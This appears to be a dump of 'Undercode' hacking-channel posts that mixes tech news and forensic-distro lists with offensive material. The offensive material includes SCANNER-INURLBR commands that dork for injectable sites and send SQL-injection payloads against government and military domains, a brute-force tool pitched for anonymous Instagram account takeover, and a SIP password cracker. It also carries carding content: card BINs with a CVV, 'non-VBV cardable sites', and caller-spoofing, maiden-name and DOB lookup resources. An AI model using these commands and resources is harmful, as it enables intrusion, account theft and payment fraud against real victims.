▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some resources for Beginers :


- How to Become a Successful Bug Bounty Hunter

- Researcher Resources - How to become a Bug Bounty Hunter

- Bug Bounties 101

- The life of a bug bounty hunter

- Awsome list of bugbounty cheatsheets

- Getting Started - Bug Bounty Hunter Methodology

:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣ git clone https://github.com/googleinurl/SCANNER-INURLBR.git

2️⃣cd SCANNER-INURLBR

3️⃣$chmod +x inurlbr.php

4️⃣ ./inurlbr.php

5️⃣To get a list of basic options and switches use:

php inurlbr.php -h

6️⃣SOME EXAMPLES :

./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'

./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'

./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'

./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?´'%270x27;"

./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'

./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?´0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'

./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?´0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'

./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?´'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'

./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?´0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'

./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m

./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u

./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'

./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6

./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'



Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

Follow Undercode Testing on :

> Twitter

> instagram

> Facebook

> Pinterest

> Linkedln

> Youtube

> Telegram

IDS, IPS AND FIREWALL EVASION USING NMAP- full guide -

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Developers added a series of RISC-V UEFI support patches for Linux
#UndercodeNews

> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed to form a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, some developers have submitted a series of patches to solve a large number of problems while adding some new capabilities to support RISC-V UEFI under Linux.

> Developer Atish Patra is from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common efi and riscv issues; patches 7-9 add Efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different code; patch 11 adds runtime services for RISC-V.

🦑To sum up, the main contributions of this series of patches are:

➕Added full ioremap support.
➕Added efi runtime service support.
➕Fixed the mm problem.

> At present, the patch has been verified on Qemu using the bootefi command in U-Boot, and has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems of EDK2 code on RISC-V are still being solved, mainly the problems related to SPI and network driver.

> This series of patches hits the Linux kernel 5.8-rc2 and is still in the PR state, waiting for the code review. If the related issues are resolved and finally accepted, then it should be visible when Linux 5.8 is released.

Share us❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New 2020 Linux Distributions-Good for any Linux developer :

[The Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 (32-bit) and x86_64 (64-bit) versions are available.

Computer Aided Investigative Environment (CAINE) - Contains numerous tools that help investigators during their analysis, including forensic evidence collection.

[CCF-VM](https://github.com/rough007/CCF-VM) - CyLR CDQR Forensics Virtual Machine (CCF-VM): An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.

Digital Evidence & Forensics Toolkit (DEFT) - Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit (DART) for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.

[NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.

PALADIN - Modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.

[Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Special Linux distro aimed at network security monitoring featuring advanced analysis tools.

SANS Investigative Forensic Toolkit (SIFT) Workstation - Demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.


Enjoy❤️👍🏻
✅2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some Verified Bin- from few days :

➕ Bin For XBox✅ :

Bin : 4095890041xxxxxx

CVV/Date: RND
IP : USA🇺🇸

➕ Bin For SoundCloud Go✅

Bin : 5422175006xxxxxx

Date: 05/21
CVV : 917
IP : USA 🇺🇸

➕Bin For Skype ✅

Bin : 515462003565xxxx

CVV/Date: RND
IP : USA 🇺🇸

➕Cc GENETRATORS
> https://t.me/UNDERCODEHACKING/2150

Enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
- Leak & Uploaded to Db-

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST MULTI PC BOOT SOFTWARES 2020 :

> Grub bOOT
https://www.gnu.org/software/grub/

> refind
https://sourceforge.net/projects/refind/

> Visual BCD Editor
https://visual-bcd-editor.en.softonic.com/#:~:text=Author's%20review-,Visual%20BCD%20Editor%20is%20an%20advanced%20GUI%20version%20of%20Windows,Every%20property%20is%20editable.

> Libreboot
https://libreboot.org/

> coreboot
https://www.coreboot.org/

> GAG
https://sourceforge.net/projects/gag/

> gummiboot
https://pkgs.org/download/gummiboot ✅ (avaible for pc & androids apk...)

🦑There is More But Those Top Rated in 2020

Enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reset Linux Password :
What to do if you forget your Linux login password ?


1️⃣If you do not have other administrative accounts and, having forgotten the password of the Linux account, you cannot enter the operating system, then to reset the password we need single-user mode .

2️⃣In single-user mode, credentials (login, password) are not requested for login, while the logged in user has superuser rights. In this mode, using the familiar passwd command , you can set a new password.

🦑The algorithm in all Linux distributions is similar:

1>GRUB Bootloader Interruption

2>Adding a boot option that includes single-user mode

3> Resume Download

4>Password change with passwd command

5>Reboot in normal mode

3️⃣Please note that the changes made in the second step (changing boot options) are temporary - they affect only one subsequent download. Therefore, when rebooting, in the fifth step, you do not need to do anything - the system will turn on in normal mode.

4️⃣To move to the end of the line and to the beginning of the line (in the second step), use the keyboard shortcuts Ctrl + a and Ctrl + e .

5️⃣Although the root password reset algorithm is similar, but different distributions may have their own nuances, consider them in more detail.

Note for UEFI : If you use UEFI instead of GRUB, then see also this article , it tells how to change the boot options in this case.


Share us❤️👍🏻
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Instagram Hacking #Rquested :

This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/Pure-L0G1C/Instagram.git

2️⃣cd Instagram

3️⃣pip3 install -r requirements.txt

4️⃣python3 instagram.py <username> <wordlist> -m <mode>

5️⃣Use sock5, for test proxies
python test_proxies.py

6️⃣For worldilst use :

> git clone https://github.com/Mebus/cupp.git

7️⃣ python3 cupp.py -h
(generate your own wordlist
The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.)

8️⃣MORE OPTIONS:



-i Interactive questions for user password profiling

-w Use this option to profile existing dictionary,
or WyD.pl output to make some pwnsauce :)

-l Download huge wordlists from repository

-a Parse default usernames and passwords directly from Alecto DB.
Project Alecto uses purified databases of Phenoelit and CIRT which where merged and enhanced.

-v Version of the program

✅Topic Git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE VPS & Trials New List :

> https://upcloud.com/vpssim/?utm_term=vps%20server&utm_campaign=Global%20-%20VPS&utm_source=adwords&utm_medium=ppc&hsa_acc=9391663435&hsa_cam=1652417669&hsa_grp=71919981308&hsa_ad=416234863334&hsa_src=g&hsa_tgt=kwd-16407600&hsa_kw=vps%20server&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gclid=EAIaIQobChMIms7YyPyr6gIVCJzVCh3mdgPiEAAYASAAEgLp3_D_BwE (Choose plan before trial- cancel)

> https://gratisvps.net/ (6months trial)

> https://developer.rackspace.com/ [600$ for 12 Months]

> https://www.runabove.com/ [1 Week Trial]

>https://www.vultr.com/ [50$ for 2 Months]

>http://cloudsigma.com/ [7 days no CC]

>https://www.ctl.io/free-trial/ [2500$ or 1 Month]

> https://www.ihor.ru/ [3 days No CC]

>http://www.neuprime.com/l_vds3.php [10 days (Otp Required)

> https://alexwebhosting.com/free-vps/ (free 30 days)

Enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Important Carding Resources !

> NON VBV Carding Sites For Carding All Websites That Are Non VBV
Here are The CARDABLE SITES NON VBV Sites

➕ www.amazon.com
➕ www.itchee.com
➕ www.bn.com
➕ www.cdnow.com
➕ www.cduniverse.com
➕ www.cdworld.com
➕ www.virginmega.com
➕ www.tunes.com
➕ www.artistdirect.com
➕ www.jeruk.com
➕ www.dvdexpress.com
➕ www.dvdworld.com
➕ www.ea.com
➕ www.tickles.com
➕ www.cduniverse.com

🦑 Zip Code Search

➕http://www.findlinks.com/
➕http://zipinfo.com/search/zipcode.htm
➕http://www.addresses.com/
➕http://www.mongabay.com/igapo/

🦑Send Fax Online

➕efax.com
➕j2.com
➕send2fax.com
➕rapidfax.comfax1.com
➕k7.net

🦑 Credit Reports
➕https://www.mycreditkeeper.com
➕https://secure.creditreport.com
➕https://qspace.iplace.com

🦑 Phone Redirect

➕http://www.tollfreeforwarding.com
➕http://www.Spoofcall.com

➕ USA phone number search
➕http://www.reversephonedetective.com

🦑 MMN search
➕ancestry.com

🦑 DOB search
➕privateeye.com

🦑 Sock5&Proxy
➕http://www.socks24.org/
➕http://www.sockslist.net


Source DeepWeb
(Not by Undercode)
Enjoy❤️👍🏻
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WorldLiSTS


1️⃣ 5-6 ✮ indonesians ✮ WorldLists :

> https://github.com/geovedi/indonesian-wordlist

2️⃣English for wpa2 WorldList :

> https://www.mediafire.com/file/6botgtnsy0rjfj9/BIG-WPA-LIST-2.rar/file

3️⃣12 Gb WordlLists :

https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
(good for everything..)

Enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft releases emergency security update to fix security vulnerabilities in Windows 10/Server
#UndercodeNews

> There are about two weeks away from this month's patch Tuesday event day, but due to security vulnerabilities found in Windows 10 and Windows Server, today Microsoft released two emergency security updates. Microsoft said that although the two vulnerabilities have not been publicly disclosed and are less likely to be exploited by hackers, the company can't wait for the July 14 patch to release the update on Tuesday's event day.

> Microsoft wrote in a security bulletin: "There is a remote code execution vulnerability in the way Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information and further harm the user's system."

> It is reported that the affected versions of Windows include

Windows 10 version 1709

Windows 10 version 1803

Windows 10 version 1809

Windows 10 version 1903

Windows 10 version 1909

Windows 10 version 2004

Windows Server 2019

Windows Server version 1803

Windows Server version 1903

Windows Server version 1909

Windows Server version 2004

@UndercodeNews
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Topic Pentesting tools
➕Termux-Linux
SIPVicious OSS security tools

>svmap - this is a sip scanner. Lists SIP devices found on an IP range
>svwar - identifies active extensions on a PBX
>svcrack - an online password cracker for SIP PBX
>svreport - manages sessions and exports reports to various formats
>svcrash - attempts to stop unauthorized svwar and svcrack scans

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/EnableSecurity/sipvicious.git

2️⃣cd sipvicious

3️⃣python setup.py install

4️⃣Fire-up the scripts one by one:

sipvicious_svmap --help
sipvicious_svcrack --help
sipvicious_svcrash --help
sipvicious_svwar --help
sipvicious_svreport --help

🦑Tested by Undercode On :

> ubuntu

✅git sources 2020
Enjoy ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁